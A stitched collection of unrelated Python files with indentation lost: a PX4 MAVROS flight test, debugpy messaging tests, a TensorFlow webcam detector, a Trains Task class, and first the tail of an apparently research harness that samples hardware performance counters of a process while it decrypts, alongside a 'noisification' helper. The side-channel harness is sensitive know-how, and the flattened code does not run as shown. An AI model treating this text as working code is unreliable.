noisification_log_file = None
quickhpc_log_file = None
result = False
try:
# flush memory - should run with sudo
os.system ("sh -c 'echo 3 >/proc/sys/vm/drop_caches'")
server = socket.socket (socket.AF_INET, socket.SOCK_STREAM)
server.setsockopt (socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
server.listen(2) # max backlog of connections
TCP_IP, TCP_PORT = server.getsockname()
# Create socket
# print 'Waiting for target, at {}:{}'.format (TCP_IP, TCP_PORT)
# target_sock, address = server.accept ()
# print "target - Connection address:{}".format(address)
# open scam_noisification as a subprocess
noisification_log_file = open(noisification_log_filename, "w")
noisification_log_proc = subprocess.Popen(shlex.split("xterm -e tail -f " + noisification_log_filename), stdout=subprocess.PIPE, stdin=subprocess.PIPE, stderr=subprocess.PIPE)
noisification_proc = subprocess.Popen([NOISIFICATION_PATH,str(TCP_PORT)], stdout=subprocess.PIPE, stdin=subprocess.PIPE, stderr=subprocess.PIPE)
noisification_stdout = threading.Thread(target = process_logger, args=(noisification_proc.stdout, noisification_log_file))
noisification_stdout.start ()
print 'Listening on {}:{}'.format (TCP_IP, TCP_PORT)
noise_sock, address = server.accept ()
print "noisification - Connection address:{}".format(address)
# data = target_sock.recv (BUFFER_SIZE)
# while True:
# if data == server_request:
# break
# print "received data:{}".format(data)
# Ranking I
send_to_client (noise_sock, "2")
# print "sending response to server {}".format(server_response)
# send_to_client (target_sock, server_response)
raw_input("Turn on the target, start the decryption process, and press any key...")
time.sleep(2) # wait for server to start decrypt
# Ranking II
send_to_client (noise_sock, "3")
# Quickhpc
target_pid = raw_input("to start monitoring, please enter target PID:")
while not pid_exists(int(target_pid)):
target_pid = raw_input("Wrong PID, try again, please enter target PID:")
quickhpc_cmd = QUICKHPC_PATH + " -a " + target_pid + \
" -c " + QUICKHPC_CONF + " -i " + QUICKHPC_INTERVAL_DURATION + \
" -n " + QUICKHPC_NUM_OF_ITERATION
quickhpc_log_file = open(quickhpc_log_filename,"w")
quickhpc_file_lock = threading.Lock()
quickhpc_proc = subprocess.Popen(shlex.split(quickhpc_cmd),stdout=subprocess.PIPE, stdin=subprocess.PIPE, stderr=subprocess.PIPE)
quickhpc_analyzer_proc = threading.Thread(target = quickhpc_analyzer, args=[quickhpc_proc.stdout])
quickhpc_stderr = threading.Thread(target = process_logger, args=(quickhpc_proc.stderr,quickhpc_log_file,quickhpc_file_lock))
lastTimeAttack = int(time.time())
quickhpc_analyzer_proc.start()
quickhpc_stderr.start()
while True:
time.sleep(0.01)
except (KeyboardInterrupt, SystemExit):
pass
finally:
try:
if server is not None:
server.close()
keepRunning = False
noisification_log_proc.kill ()
noisification_proc.kill()
if noisification_stdout.isAlive():
noisification_stdout.join()
quickhpc_proc.kill()
if quickhpc_analyzer_proc is not None and quickhpc_analyzer_proc.isAlive():
quickhpc_analyzer_proc.join()
if quickhpc_stderr is not None and quickhpc_stderr.isAlive():
quickhpc_stderr.join()
if quickhpc_log_file is not None:
quickhpc_log_file.close()
if noisification_log_file is not None:
noisification_log_file.close()
except UnboundLocalError:
pass
return result
if __name__ == "__main__":
sys.exit(main())
|
app_hooks.py
|
from threading import Thread
from . import audio
def on_server_loaded(server_context):
t = Thread(target=audio.update_audio_data, args=())
t.setDaemon(True)
t.start()
|
mavros_offboard_attctl_test.py
|
#!/usr/bin/env python2
#***************************************************************************
#
# Copyright (c) 2015 PX4 Development Team. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in
# the documentation and/or other materials provided with the
# distribution.
# 3. Neither the name PX4 nor the names of its contributors may be
# used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS
# OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED
# AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
#***************************************************************************/
#
# @author Andreas Antener <[email protected]>
#
# The shebang of this file is currently Python2 because some
# dependencies such as pymavlink don't play well with Python3 yet.
from __future__ import division
PKG = 'px4'
import rospy
from geometry_msgs.msg import Quaternion, Vector3
from mavros_msgs.msg import AttitudeTarget
from mavros_test_common import MavrosTestCommon
from pymavlink import mavutil
from std_msgs.msg import Header
from threading import Thread
from tf.transformations import quaternion_from_euler
class MavrosOffboardAttctlTest(MavrosTestCommon):
"""
Tests flying in offboard control by sending attitude and thrust setpoints
via MAVROS.
For the test to be successful it needs to cross a certain boundary in time.
"""
def setUp(self):
super(MavrosOffboardAttctlTest, self).setUp()
self.att = AttitudeTarget()
self.att_setpoint_pub = rospy.Publisher(
'mavros/setpoint_raw/attitude', AttitudeTarget, queue_size=1)
        # send setpoints in separate thread to better prevent failsafe
self.att_thread = Thread(target=self.send_att, args=())
self.att_thread.daemon = True
self.att_thread.start()
def tearDown(self):
super(MavrosOffboardAttctlTest, self).tearDown()
#
# Helper methods
#
def send_att(self):
rate = rospy.Rate(10) # Hz
self.att.body_rate = Vector3()
self.att.header = Header()
self.att.header.frame_id = "base_footprint"
self.att.orientation = Quaternion(*quaternion_from_euler(-0.25, 0.5,
0))
self.att.thrust = 0.7
self.att.type_mask = 7 # ignore body rate
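        # stream the setpoints continuously: if the stream stalls, PX4's
        # offboard failsafe can kick in (hence the dedicated thread); 10 Hz
        # is comfortably above the required minimum rate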
while not rospy.is_shutdown():
self.att.header.stamp = rospy.Time.now()
self.att_setpoint_pub.publish(self.att)
try: # prevent garbage in console output when thread is killed
rate.sleep()
except rospy.ROSInterruptException:
pass
#
# Test method
#
def test_attctl(self):
"""Test offboard attitude control"""
# boundary to cross
boundary_x = 200
boundary_y = 100
boundary_z = 20
# make sure the simulation is ready to start the mission
self.wait_for_topics(60)
self.wait_for_landed_state(mavutil.mavlink.MAV_LANDED_STATE_ON_GROUND,
10, -1)
self.log_topic_vars()
self.set_mode("OFFBOARD", 5)
self.set_arm(True, 5)
rospy.loginfo("run mission")
rospy.loginfo("attempting to cross boundary | x: {0}, y: {1}, z: {2}".
format(boundary_x, boundary_y, boundary_z))
# does it cross expected boundaries in 'timeout' seconds?
timeout = 90 # (int) seconds
loop_freq = 2 # Hz
rate = rospy.Rate(loop_freq)
crossed = False
for i in xrange(timeout * loop_freq):
if (self.local_position.pose.position.x > boundary_x and
self.local_position.pose.position.y > boundary_y and
self.local_position.pose.position.z > boundary_z):
rospy.loginfo("boundary crossed | seconds: {0} of {1}".format(
i / loop_freq, timeout))
crossed = True
break
try:
rate.sleep()
except rospy.ROSException as e:
self.fail(e)
self.assertTrue(crossed, (
"took too long to cross boundaries | current position x: {0:.2f}, y: {1:.2f}, z: {2:.2f} | timeout(seconds): {3}".
format(self.local_position.pose.position.x,
self.local_position.pose.position.y,
self.local_position.pose.position.z, timeout)))
self.set_mode("AUTO.LAND", 5)
self.wait_for_landed_state(mavutil.mavlink.MAV_LANDED_STATE_ON_GROUND,
90, 0)
self.set_arm(False, 5)
if __name__ == '__main__':
import rostest
rospy.init_node('test_node', anonymous=True)
rostest.rosrun(PKG, 'mavros_offboard_attctl_test',
MavrosOffboardAttctlTest)
|
test_messaging.py
|
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See LICENSE in the project root
# for license information.
from __future__ import absolute_import, division, print_function, unicode_literals
"""Tests for JSON message streams and channels.
"""
import collections
import functools
import json
import io
import pytest
import random
import re
import socket
import threading
import time
from debugpy.common import log, messaging
from tests.patterns import some
# Default timeout for tests in this file.
pytestmark = pytest.mark.timeout(5)
class JsonMemoryStream(object):
"""Like JsonIOStream, but working directly with values stored in memory.
Values are round-tripped through JSON serialization.
For input, values are read from the supplied sequence or iterator.
For output, values are appended to the supplied collection.
"""
json_decoder_factory = messaging.JsonIOStream.json_decoder_factory
json_encoder_factory = messaging.JsonIOStream.json_encoder_factory
def __init__(self, input, output, name="memory"):
self.name = name
self.input = iter(input)
self.output = output
def close(self):
pass
def _log_message(self, dir, data):
format_string = "{0} {1} " + (
"{2!j:indent=None}" if isinstance(data, list) else "{2!j}"
)
return log.debug(format_string, self.name, dir, data)
def read_json(self, decoder=None):
decoder = decoder if decoder is not None else self.json_decoder_factory()
try:
value = next(self.input)
except StopIteration:
raise messaging.NoMoreMessages(stream=self)
value = decoder.decode(json.dumps(value))
self._log_message("-->", value)
return value
def write_json(self, value, encoder=None):
encoder = encoder if encoder is not None else self.json_encoder_factory()
value = json.loads(encoder.encode(value))
self._log_message("<--", value)
self.output.append(value)
class TestJsonIOStream(object):
MESSAGE_BODY_TEMPLATE = '{"arguments": {"threadId": 3}, "command": "next", "seq": %d, "type": "request"}'
MESSAGES = []
SERIALIZED_MESSAGES = b""
@classmethod
def setup_class(cls):
for seq in range(0, 3):
message_body = cls.MESSAGE_BODY_TEMPLATE % seq
message = json.loads(
message_body, object_pairs_hook=collections.OrderedDict
)
message_body = message_body.encode("utf-8")
cls.MESSAGES.append(message)
message_header = "Content-Length: %d\r\n\r\n" % len(message_body)
cls.SERIALIZED_MESSAGES += message_header.encode("ascii") + message_body
def test_read(self):
data = io.BytesIO(self.SERIALIZED_MESSAGES)
stream = messaging.JsonIOStream(data, data, "data")
for expected_message in self.MESSAGES:
message = stream.read_json()
assert message == expected_message
with pytest.raises(messaging.NoMoreMessages) as exc_info:
stream.read_json()
assert exc_info.value.stream is stream
def test_write(self):
data = io.BytesIO()
stream = messaging.JsonIOStream(data, data, "data")
for message in self.MESSAGES:
stream.write_json(message)
data = data.getvalue()
assert data == self.SERIALIZED_MESSAGES
class TestJsonMemoryStream(object):
MESSAGES = [
{"seq": 1, "type": "request", "command": "next", "arguments": {"threadId": 3}},
{"seq": 2, "type": "request", "command": "next", "arguments": {"threadId": 5}},
]
def test_read(self):
stream = JsonMemoryStream(self.MESSAGES, [])
for expected_message in self.MESSAGES:
message = stream.read_json()
assert message == expected_message
with pytest.raises(messaging.NoMoreMessages) as exc_info:
stream.read_json()
assert exc_info.value.stream is stream
def test_write(self):
messages = []
stream = JsonMemoryStream([], messages)
for message in self.MESSAGES:
stream.write_json(message)
assert messages == self.MESSAGES
class MessageHandlerRecorder(list):
def __call__(self, handler):
@functools.wraps(handler)
def record_and_handle(instance, message):
name = handler.__name__
if isinstance(name, bytes):
name = name.decode("utf-8")
record = {"channel": message.channel, "handler": name}
if isinstance(message, messaging.Event):
record.update(
{"type": "event", "event": message.event, "body": message.body}
)
elif isinstance(message, messaging.Request):
record.update(
{
"type": "request",
"command": message.command,
"arguments": message.arguments,
}
)
self.append(record)
return handler(instance, message)
return record_and_handle
def expect(self, channel, inputs, handlers):
expected_records = []
for input, handler in zip(inputs, handlers):
expected_record = {"channel": channel, "handler": handler}
expected_record.update(
{
key: value
for key, value in input.items()
if key in ("type", "event", "command", "body", "arguments")
}
)
expected_records.append(expected_record)
assert expected_records == self
class TestJsonMessageChannel(object):
@staticmethod
def iter_with_event(collection):
"""Like iter(), but also exposes a threading.Event that is set
when the returned iterator is exhausted.
"""
exhausted = threading.Event()
def iterate():
for x in collection:
yield x
exhausted.set()
return iterate(), exhausted
def test_events(self):
EVENTS = [
{
"seq": 1,
"type": "event",
"event": "stopped",
"body": {"reason": "pause"},
},
{
"seq": 2,
"type": "event",
"event": "unknown",
"body": {"something": "else"},
},
]
recorder = MessageHandlerRecorder()
class Handlers(object):
@recorder
def stopped_event(self, event):
assert event.event == "stopped"
@recorder
def event(self, event):
assert event.event == "unknown"
stream = JsonMemoryStream(EVENTS, [])
channel = messaging.JsonMessageChannel(stream, Handlers())
channel.start()
channel.wait()
recorder.expect(channel, EVENTS, ["stopped_event", "event"])
def test_requests(self):
REQUESTS = [
{
"seq": 1,
"type": "request",
"command": "next",
"arguments": {"threadId": 3},
},
{
"seq": 2,
"type": "request",
"command": "launch",
"arguments": {"program": "main.py"},
},
{
"seq": 3,
"type": "request",
"command": "unknown",
"arguments": {"answer": 42},
},
{
"seq": 4,
"type": "request",
"command": "pause",
"arguments": {"threadId": 5},
},
]
recorder = MessageHandlerRecorder()
class Handlers(object):
@recorder
def next_request(self, request):
assert request.command == "next"
return {"threadId": 7}
@recorder
def launch_request(self, request):
assert request.command == "launch"
self._launch = request
return messaging.NO_RESPONSE
@recorder
def request(self, request):
request.respond({})
@recorder
def pause_request(self, request):
assert request.command == "pause"
self._launch.respond({"processId": 9})
raise request.cant_handle("pause error")
stream = JsonMemoryStream(REQUESTS, [])
channel = messaging.JsonMessageChannel(stream, Handlers())
channel.start()
channel.wait()
recorder.expect(
channel,
REQUESTS,
["next_request", "launch_request", "request", "pause_request"],
)
assert stream.output == [
{
"seq": 1,
"type": "response",
"request_seq": 1,
"command": "next",
"success": True,
"body": {"threadId": 7},
},
{
"seq": 2,
"type": "response",
"request_seq": 3,
"command": "unknown",
"success": True,
},
{
"seq": 3,
"type": "response",
"request_seq": 2,
"command": "launch",
"success": True,
"body": {"processId": 9},
},
{
"seq": 4,
"type": "response",
"request_seq": 4,
"command": "pause",
"success": False,
"message": "pause error",
},
]
def test_responses(self):
request1_sent = threading.Event()
request2_sent = threading.Event()
request3_sent = threading.Event()
request4_sent = threading.Event()
def iter_responses():
request1_sent.wait()
yield {
"seq": 1,
"type": "response",
"request_seq": 1,
"command": "next",
"success": True,
"body": {"threadId": 3},
}
request2_sent.wait()
yield {
"seq": 2,
"type": "response",
"request_seq": 2,
"command": "pause",
"success": False,
"message": "Invalid message: pause not supported",
}
request3_sent.wait()
yield {
"seq": 3,
"type": "response",
"request_seq": 3,
"command": "next",
"success": True,
"body": {"threadId": 5},
}
request4_sent.wait()
stream = JsonMemoryStream(iter_responses(), [])
channel = messaging.JsonMessageChannel(stream, None)
channel.start()
# Blocking wait.
request1 = channel.send_request("next")
request1_sent.set()
log.info("Waiting for response...")
response1_body = request1.wait_for_response()
response1 = request1.response
assert response1.success
assert response1.request is request1
assert response1.body == response1_body
assert response1.body == {"threadId": 3}
# Async callback, registered before response is received.
request2 = channel.send_request("pause")
response2 = []
response2_received = threading.Event()
def response2_handler(resp):
response2.append(resp)
response2_received.set()
log.info("Registering callback")
request2.on_response(response2_handler)
request2_sent.set()
log.info("Waiting for callback...")
response2_received.wait()
(response2,) = response2
assert not response2.success
assert response2.request is request2
assert response2 is request2.response
assert response2.body == messaging.InvalidMessageError(
"pause not supported", request2
)
# Async callback, registered after response is received.
request3 = channel.send_request("next")
request3_sent.set()
request3.wait_for_response()
response3 = []
response3_received = threading.Event()
def response3_handler(resp):
response3.append(resp)
response3_received.set()
log.info("Registering callback")
request3.on_response(response3_handler)
log.info("Waiting for callback...")
response3_received.wait()
(response3,) = response3
assert response3.success
assert response3.request is request3
assert response3 is request3.response
assert response3.body == {"threadId": 5}
# Async callback, registered after channel is closed.
request4 = channel.send_request("next")
request4_sent.set()
channel.wait()
response4 = []
response4_received = threading.Event()
def response4_handler(resp):
response4.append(resp)
response4_received.set()
log.info("Registering callback")
request4.on_response(response4_handler)
log.info("Waiting for callback...")
response4_received.wait()
(response4,) = response4
assert not response4.success
assert response4.request is request4
assert response4 is request4.response
assert isinstance(response4.body, messaging.NoMoreMessages)
def test_invalid_request_handling(self):
REQUESTS = [
{
"seq": 1,
"type": "request",
"command": "stackTrace",
"arguments": {"AAA": {}},
},
{"seq": 2, "type": "request", "command": "stackTrace", "arguments": {}},
{"seq": 3, "type": "request", "command": "unknown", "arguments": None},
{"seq": 4, "type": "request", "command": "pause"},
]
class Handlers(object):
def stackTrace_request(self, request):
request.arguments["AAA"]
request.arguments["AAA"]["BBB"]
def request(self, request):
request.arguments["CCC"]
def pause_request(self, request):
request.arguments["DDD"]
output = []
stream = JsonMemoryStream(REQUESTS, output)
channel = messaging.JsonMessageChannel(stream, Handlers())
channel.start()
channel.wait()
def missing_property(name):
return some.str.matching("Invalid message:.*" + re.escape(name) + ".*")
assert output == [
{
"seq": 1,
"type": "response",
"request_seq": 1,
"command": "stackTrace",
"success": False,
"message": missing_property("BBB"),
},
{
"seq": 2,
"type": "response",
"request_seq": 2,
"command": "stackTrace",
"success": False,
"message": missing_property("AAA"),
},
{
"seq": 3,
"type": "response",
"request_seq": 3,
"command": "unknown",
"success": False,
"message": missing_property("CCC"),
},
{
"seq": 4,
"type": "response",
"request_seq": 4,
"command": "pause",
"success": False,
"message": missing_property("DDD"),
},
]
def test_fuzz(self):
# Set up two channels over the same stream that send messages to each other
# asynchronously, and record everything that they send and receive.
# All records should match at the end.
class Fuzzer(object):
def __init__(self, name):
self.name = name
self.lock = threading.Lock()
self.sent = []
self.received = []
self.responses_sent = []
self.responses_received = []
self.done = False
def start(self, channel):
self._worker = threading.Thread(
name=self.name,
target=lambda: self._send_requests_and_events(channel),
)
self._worker.daemon = True
self._worker.start()
def wait(self):
self._worker.join()
def done_event(self, event):
with self.lock:
self.done = True
def fizz_event(self, event):
assert event.event == "fizz"
with self.lock:
self.received.append(("event", "fizz", event.body))
def buzz_event(self, event):
assert event.event == "buzz"
with self.lock:
self.received.append(("event", "buzz", event.body))
def event(self, event):
with self.lock:
self.received.append(("event", event.event, event.body))
def make_and_log_response(self, request):
x = random.randint(-100, 100)
if x < 0:
exc_type = (
messaging.InvalidMessageError
if x % 2
else messaging.MessageHandlingError
)
x = exc_type(str(x), request)
with self.lock:
self.responses_sent.append((request.seq, x))
return x
def fizz_request(self, request):
assert request.command == "fizz"
with self.lock:
self.received.append(("request", "fizz", request.arguments))
return self.make_and_log_response(request)
def buzz_request(self, request):
assert request.command == "buzz"
with self.lock:
self.received.append(("request", "buzz", request.arguments))
return self.make_and_log_response(request)
def request(self, request):
with self.lock:
self.received.append(
("request", request.command, request.arguments)
)
return self.make_and_log_response(request)
def _got_response(self, response):
with self.lock:
self.responses_received.append(
(response.request.seq, response.body)
)
def _send_requests_and_events(self, channel):
types = [random.choice(("event", "request")) for _ in range(0, 100)]
for typ in types:
name = random.choice(("fizz", "buzz", "fizzbuzz"))
body = random.randint(0, 100)
with self.lock:
self.sent.append((typ, name, body))
if typ == "event":
channel.send_event(name, body)
elif typ == "request":
req = channel.send_request(name, body)
req.on_response(self._got_response)
channel.send_event("done")
# Spin until we receive "done", and also get responses to all requests.
requests_sent = types.count("request")
log.info("{0} waiting for {1} responses...", self.name, requests_sent)
while True:
with self.lock:
if self.done:
if requests_sent == len(self.responses_received):
break
time.sleep(0.1)
fuzzer1 = Fuzzer("fuzzer1")
fuzzer2 = Fuzzer("fuzzer2")
server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_socket.bind(("localhost", 0))
_, port = server_socket.getsockname()
server_socket.listen(0)
socket1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
socket1_thread = threading.Thread(
target=lambda: socket1.connect(("localhost", port))
)
socket1_thread.start()
socket2, _ = server_socket.accept()
socket1_thread.join()
try:
io1 = socket1.makefile("rwb", 0)
io2 = socket2.makefile("rwb", 0)
stream1 = messaging.JsonIOStream(io1, io1, "socket1")
channel1 = messaging.JsonMessageChannel(stream1, fuzzer1)
channel1.start()
fuzzer1.start(channel1)
stream2 = messaging.JsonIOStream(io2, io2, "socket2")
channel2 = messaging.JsonMessageChannel(stream2, fuzzer2)
channel2.start()
fuzzer2.start(channel2)
fuzzer1.wait()
fuzzer2.wait()
finally:
socket1.close()
socket2.close()
assert fuzzer1.sent == fuzzer2.received
assert fuzzer2.sent == fuzzer1.received
assert fuzzer1.responses_sent == fuzzer2.responses_received
assert fuzzer2.responses_sent == fuzzer1.responses_received
|
object_detection_test_increase_fps_multithreading.py
|
import cv2
import numpy as np
import os
import sys
import tarfile
import time
import argparse
import tensorflow as tf
import multiprocessing
from threading import Thread
from multiprocessing import Queue, Pool
from mytools.app_utils import FPS, WebcamVideoStream, draw_boxes_and_labels
from object_detection.utils import label_map_util
from object_detection.utils import visualization_utils as vis_util
CWD_PATH = os.getcwd()
MODEL_NAME = 'ssd_mobilenet_v1_coco_2017_11_17'
MODEL_FILE = os.path.join(CWD_PATH, MODEL_NAME + '.tar.gz')
DOWNLOAD_BASE = 'http://download.tensorflow.org/models/object_detection/'
PATH_TO_CKPT = os.path.join(CWD_PATH, MODEL_NAME, 'frozen_inference_graph.pb')
# List of the strings used to add the correct label to each box.
PATH_TO_LABELS = os.path.join(CWD_PATH, 'object_detection', 'data', 'mscoco_label_map.pbtxt')
NUM_CLASSES = 90
# opener = urllib.request.URLopener()
# opener.retrieve(DOWNLOAD_BASE + MODEL_NAME + '.tar.gz', MODEL_FILE)
# tar_file = tarfile.open(MODEL_FILE)
# for file in tar_file.getmembers():
# file_name = os.path.basename(file.name)
# if 'frozen_inference_graph.pb' in file_name:
# tar_file.extract(file, os.getcwd())
label_map = label_map_util.load_labelmap(PATH_TO_LABELS)
categories = label_map_util.convert_label_map_to_categories(label_map, max_num_classes=NUM_CLASSES,
use_display_name=True)
category_index = label_map_util.create_category_index(categories)
# added for GPU support
config = tf.ConfigProto()
config.gpu_options.allow_growth = True
# config.gpu_options.per_process_gpu_memory_fraction = 0.7
# Object-detection network: a forward pass returns the detection results.
def detect_objects(image_np, sess, detection_graph):
# Expand dimensions since the model expects images to have shape: [1, None, None, 3]
image_np_expanded = np.expand_dims(image_np, axis=0)
image_tensor = detection_graph.get_tensor_by_name('image_tensor:0')
# Each box represents a part of the image where a particular object was detected.
boxes = detection_graph.get_tensor_by_name('detection_boxes:0')
# Each score represents the level of confidence for each of the objects.
# Score is shown on the result image, together with the class label.
scores = detection_graph.get_tensor_by_name('detection_scores:0')
classes = detection_graph.get_tensor_by_name('detection_classes:0')
num_detections = detection_graph.get_tensor_by_name('num_detections:0')
# Actual detection.
(boxes, scores, classes, num_detections) = sess.run(
[boxes, scores, classes, num_detections],
feed_dict={image_tensor: image_np_expanded})
# Visualization of the results of a detection.
rect_points, class_names, class_colors = draw_boxes_and_labels(
boxes=np.squeeze(boxes),
classes=np.squeeze(classes).astype(np.int32),
scores=np.squeeze(scores),
category_index=category_index,
min_score_thresh=.5
)
return dict(rect_points=rect_points, class_names=class_names, class_colors=class_colors)
# Worker function for multi-process execution; each worker running it loads the TensorFlow model once (this script starts the workers as threads).
def worker(input_q, output_q):
# Load a (frozen) Tensorflow model into memory.
detection_graph = tf.Graph()
with detection_graph.as_default():
od_graph_def = tf.GraphDef()
with tf.gfile.GFile(PATH_TO_CKPT, 'rb') as fid:
serialized_graph = fid.read()
od_graph_def.ParseFromString(serialized_graph)
tf.import_graph_def(od_graph_def, name='')
sess = tf.Session(graph=detection_graph, config=config)
fps = FPS().start()
while True:
fps.update()
frame = input_q.get()
frame_rgb = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
output_q.put(detect_objects(frame_rgb, sess, detection_graph))
fps.stop()
sess.close()
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('-src', '--source', dest='video_source', type=int,
default=0, help='Device index of the camera.')
parser.add_argument('-wd', '--width', dest='width', type=int,
default=480, help='Width of the frames in the video stream.')
parser.add_argument('-ht', '--height', dest='height', type=int,
default=360, help='Height of the frames in the video stream.')
args = parser.parse_args()
input_q = Queue(10)  # a larger queue improves FPS but adds latency
output_q = Queue()
for i in range(1):
t = Thread(target=worker, args=(input_q, output_q))
t.daemon = True
t.start()
video_capture = WebcamVideoStream(src=args.video_source,
width=args.width,
height=args.height).start()
fps = FPS().start()
while True:
frame = video_capture.read()
input_q.put(frame)
t = time.time()
if output_q.empty():
pass # fill up queue
else:
font = cv2.FONT_HERSHEY_SIMPLEX
data = output_q.get()
rec_points = data['rect_points']
class_names = data['class_names']
class_colors = data['class_colors']
for point, name, color in zip(rec_points, class_names, class_colors):
cv2.rectangle(frame, (int(point['xmin'] * args.width), int(point['ymin'] * args.height)),
(int(point['xmax'] * args.width), int(point['ymax'] * args.height)), color, 3)
cv2.rectangle(frame, (int(point['xmin'] * args.width), int(point['ymin'] * args.height)),
(int(point['xmin'] * args.width) + len(name[0]) * 6,
int(point['ymin'] * args.height) - 10), color, -1, cv2.LINE_AA)
cv2.putText(frame, name[0], (int(point['xmin'] * args.width), int(point['ymin'] * args.height)), font,
0.3, (0, 0, 0), 1)
cv2.imshow('Video', frame)
fps.update()
print('[INFO] elapsed time: {:.2f}'.format(time.time() - t))
if cv2.waitKey(1) & 0xFF == ord('q'):
break
fps.stop()
print('[INFO] elapsed time (total): {:.2f}'.format(fps.elapsed()))
print('[INFO] approx. FPS: {:.2f}'.format(fps.fps()))
video_capture.stop()
cv2.destroyAllWindows()
|
task.py
|
import atexit
import os
import signal
import sys
import threading
import time
from argparse import ArgumentParser
from tempfile import mkstemp
try:
# noinspection PyCompatibility
from collections.abc import Callable, Sequence as CollectionsSequence
except ImportError:
from collections import Callable, Sequence as CollectionsSequence
from typing import Optional, Union, Mapping, Sequence, Any, Dict, Iterable, TYPE_CHECKING
import psutil
import six
from pathlib2 import Path
from .backend_api.services import tasks, projects, queues
from .backend_api.session.session import Session, ENV_ACCESS_KEY, ENV_SECRET_KEY
from .backend_interface.metrics import Metrics
from .backend_interface.model import Model as BackendModel
from .backend_interface.task import Task as _Task
from .backend_interface.task.development.worker import DevWorker
from .backend_interface.task.repo import ScriptInfo
from .backend_interface.util import get_single_result, exact_match_regex, make_message, mutually_exclusive
from .binding.absl_bind import PatchAbsl
from .binding.artifacts import Artifacts, Artifact
from .binding.environ_bind import EnvironmentBind, PatchOsFork
from .binding.frameworks.fastai_bind import PatchFastai
from .binding.frameworks.pytorch_bind import PatchPyTorchModelIO
from .binding.frameworks.tensorflow_bind import TensorflowBinding
from .binding.frameworks.xgboost_bind import PatchXGBoostModelIO
from .binding.joblib_bind import PatchedJoblib
from .binding.matplotlib_bind import PatchedMatplotlib
from .config import config, DEV_TASK_NO_REUSE, get_is_master_node
from .config import running_remotely, get_remote_task_id
from .config.cache import SessionCache
from .debugging.log import LoggerRoot
from .errors import UsageError
from .logger import Logger
from .model import Model, InputModel, OutputModel, ARCHIVED_TAG
from .task_parameters import TaskParameters
from .utilities.args import argparser_parseargs_called, get_argparser_last_args, \
argparser_update_currenttask
from .utilities.dicts import ReadOnlyDict, merge_dicts
from .utilities.proxy_object import ProxyDictPreWrite, ProxyDictPostWrite, flatten_dictionary, \
nested_from_flat_dictionary, naive_nested_from_flat_dictionary
from .utilities.resource_monitor import ResourceMonitor
from .utilities.seed import make_deterministic
# noinspection PyProtectedMember
from .backend_interface.task.args import _Arguments
if TYPE_CHECKING:
import pandas
import numpy
from PIL import Image
class Task(_Task):
"""
The ``Task`` class is a code template for a Task object which, together with its connected experiment components,
represents the current running experiment. These connected components include hyperparameters, loggers,
configuration, label enumeration, models, and other artifacts.
The term "main execution Task" refers to the Task context for current running experiment. Python experiment scripts
can create one, and only one, main execution Task. It is traceable, and after a script runs and Trains stores
the Task in the **Trains Server** (backend), it is modifiable, reproducible, executable by a worker, and you
can duplicate it for further experimentation.
The ``Task`` class and its methods allow you to create and manage experiments, as well as perform
advanced experimentation functions, such as autoML.
.. warning::
Do not construct Task objects directly. Use one of the methods listed below to create experiments or
reference existing experiments.
For detailed information about creating Task objects, see the following methods:
- Create a new reproducible Task - :meth:`Task.init`
.. important::
In some cases, ``Task.init`` may return a Task object which is already stored in **Trains Server** (already
initialized), instead of creating a new Task. For a detailed explanation of those cases, see the ``Task.init``
method.
- Create a new non-reproducible Task - :meth:`Task.create`
- Get the current running Task - :meth:`Task.current_task`
- Get another (different) Task - :meth:`Task.get_task`
.. note::
The **Trains** documentation often refers to a Task as, "Task (experiment)".
"Task" refers to the class in the Trains Python Client Package, the object in your Python experiment script,
and the entity with which **Trains Server** and **Trains Agent** work.
"Experiment" refers to your deep learning solution, including its connected components, inputs, and outputs,
and is the experiment you can view, analyze, compare, modify, duplicate, and manage using the Trains
**Web-App** (UI).
Therefore, a "Task" is effectively an "experiment", and "Task (experiment)" encompasses its usage throughout
Trains.
The exception to this Task behavior is sub-tasks (non-reproducible Tasks), which do not use the main execution
Task. Creating a sub-task always creates a new Task with a new Task ID.
"""
TaskTypes = _Task.TaskTypes
NotSet = object()
__create_protection = object()
__main_task = None # type: Optional[Task]
__exit_hook = None
__forked_proc_main_pid = None
__task_id_reuse_time_window_in_hours = float(config.get('development.task_reuse_time_window_in_hours', 24.0))
__detect_repo_async = config.get('development.vcs_repo_detect_async', False)
__default_output_uri = config.get('development.default_output_uri', None)
class _ConnectedParametersType(object):
argparse = "argument_parser"
dictionary = "dictionary"
task_parameters = "task_parameters"
@classmethod
def _options(cls):
return {
var for var, val in vars(cls).items()
if isinstance(val, six.string_types)
}
def __init__(self, private=None, **kwargs):
"""
.. warning::
**Do not construct Task manually!**
Please use :meth:`Task.init` or :meth:`Task.get_task`
"""
if private is not Task.__create_protection:
raise UsageError(
'Task object cannot be instantiated externally, use Task.current_task() or Task.get_task(...)')
self._repo_detect_lock = threading.RLock()
